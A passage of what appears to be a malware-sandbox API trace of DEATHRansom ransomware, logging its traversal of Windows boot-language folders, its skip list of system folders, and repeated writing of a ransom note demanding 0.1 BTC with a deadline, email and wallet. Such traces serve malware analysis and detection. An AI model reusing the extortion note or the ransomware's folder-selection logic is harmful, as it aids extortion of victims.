bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.051] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.051] CloseHandle (hObject=0x7a8) returned 1 [0075.052] GetProcessHeap () returned 0x4f10000 [0075.052] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ad0070 | out: hHeap=0x4f10000) returned 1 [0075.052] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0075.052] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR") returned 17 [0075.052] lstrcmpW (lpString1="tr-TR", lpString2="..") returned 1 [0075.052] lstrcmpW (lpString1="tr-TR", lpString2=".") returned 1 [0075.052] StrStrW (lpFirst="tr-tr", lpSrch="programdata") returned 0x0 [0075.052] StrStrW (lpFirst="tr-tr", lpSrch="$recycle.bin") returned 0x0 [0075.052] StrStrW (lpFirst="tr-tr", lpSrch="program files") returned 0x0 [0075.052] StrStrW (lpFirst="tr-tr", lpSrch="windows") returned 0x0 [0075.052] StrStrW (lpFirst="tr-tr", lpSrch="all users") returned 0x0 [0075.052] StrStrW (lpFirst="tr-tr", lpSrch="appdata") returned 0x0 [0075.052] GetProcessHeap () returned 0x4f10000 [0075.052] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.052] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\tr-TR" | out: lpString1="\\\\?\\C:\\Boot\\tr-TR") returned="\\\\?\\C:\\Boot\\tr-TR" [0075.052] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 22 [0075.052] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.053] GetProcessHeap () returned 0x4f10000 [0075.053] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.053] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\*") returned 19 [0075.053] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.053] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\.") returned 19 [0075.053] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.053] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.053] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.053] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\..") returned 20 [0075.054] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.054] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.054] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 33 [0075.054] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.054] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.054] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\read_me.txt") returned 29 [0075.054] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\read_me.txt" (normalized: "c:\\boot\\tr-tr\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.054] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.054] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.055] CloseHandle (hObject=0x7a8) returned 1 [0075.055] GetProcessHeap () returned 0x4f10000 [0075.055] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.055] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0075.055] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN") returned 17 [0075.055] lstrcmpW (lpString1="zh-CN", lpString2="..") returned 1 [0075.055] lstrcmpW (lpString1="zh-CN", lpString2=".") returned 1 [0075.055] StrStrW (lpFirst="zh-cn", lpSrch="programdata") returned 0x0 [0075.055] StrStrW (lpFirst="zh-cn", lpSrch="$recycle.bin") returned 0x0 [0075.055] StrStrW (lpFirst="zh-cn", lpSrch="program files") returned 0x0 [0075.055] StrStrW (lpFirst="zh-cn", lpSrch="windows") returned 0x0 [0075.055] StrStrW (lpFirst="zh-cn", lpSrch="all users") returned 0x0 [0075.055] StrStrW (lpFirst="zh-cn", lpSrch="appdata") returned 0x0 [0075.055] GetProcessHeap () returned 0x4f10000 [0075.055] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.055] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\zh-CN" | out: lpString1="\\\\?\\C:\\Boot\\zh-CN") returned="\\\\?\\C:\\Boot\\zh-CN" [0075.056] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 23 [0075.056] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.056] GetProcessHeap () returned 0x4f10000 [0075.057] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.057] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\*") returned 19 [0075.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.057] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\.") returned 19 [0075.057] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.057] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.057] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.057] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\..") returned 20 [0075.057] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.058] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.058] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 33 [0075.058] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.058] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.058] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\read_me.txt") returned 29 [0075.058] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\read_me.txt" (normalized: "c:\\boot\\zh-cn\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.058] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.058] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.059] CloseHandle (hObject=0x7a8) returned 1 [0075.059] GetProcessHeap () returned 0x4f10000 [0075.059] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.059] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0075.059] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK") returned 17 [0075.059] lstrcmpW (lpString1="zh-HK", lpString2="..") returned 1 [0075.059] lstrcmpW (lpString1="zh-HK", lpString2=".") returned 1 [0075.059] StrStrW (lpFirst="zh-hk", lpSrch="programdata") returned 0x0 [0075.059] StrStrW (lpFirst="zh-hk", lpSrch="$recycle.bin") returned 0x0 [0075.059] StrStrW (lpFirst="zh-hk", lpSrch="program files") returned 0x0 [0075.059] StrStrW (lpFirst="zh-hk", lpSrch="windows") returned 0x0 [0075.059] StrStrW (lpFirst="zh-hk", lpSrch="all users") returned 0x0 [0075.059] StrStrW (lpFirst="zh-hk", lpSrch="appdata") returned 0x0 [0075.059] GetProcessHeap () returned 0x4f10000 [0075.059] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.059] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\zh-HK" | out: lpString1="\\\\?\\C:\\Boot\\zh-HK") returned="\\\\?\\C:\\Boot\\zh-HK" [0075.060] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 24 [0075.060] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.061] GetProcessHeap () returned 0x4f10000 [0075.061] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.061] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\*") returned 19 [0075.061] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.061] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\.") returned 19 [0075.061] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.061] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.061] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.061] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\..") returned 20 [0075.061] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.061] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.061] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 33 [0075.061] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.061] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.061] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\read_me.txt") returned 29 [0075.061] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\read_me.txt" (normalized: "c:\\boot\\zh-hk\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.061] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.061] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.062] CloseHandle (hObject=0x7a8) returned 1 [0075.062] GetProcessHeap () returned 0x4f10000 [0075.062] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.062] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0075.062] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW") returned 17 [0075.062] lstrcmpW (lpString1="zh-TW", lpString2="..") returned 1 [0075.063] lstrcmpW (lpString1="zh-TW", lpString2=".") returned 1 [0075.063] StrStrW 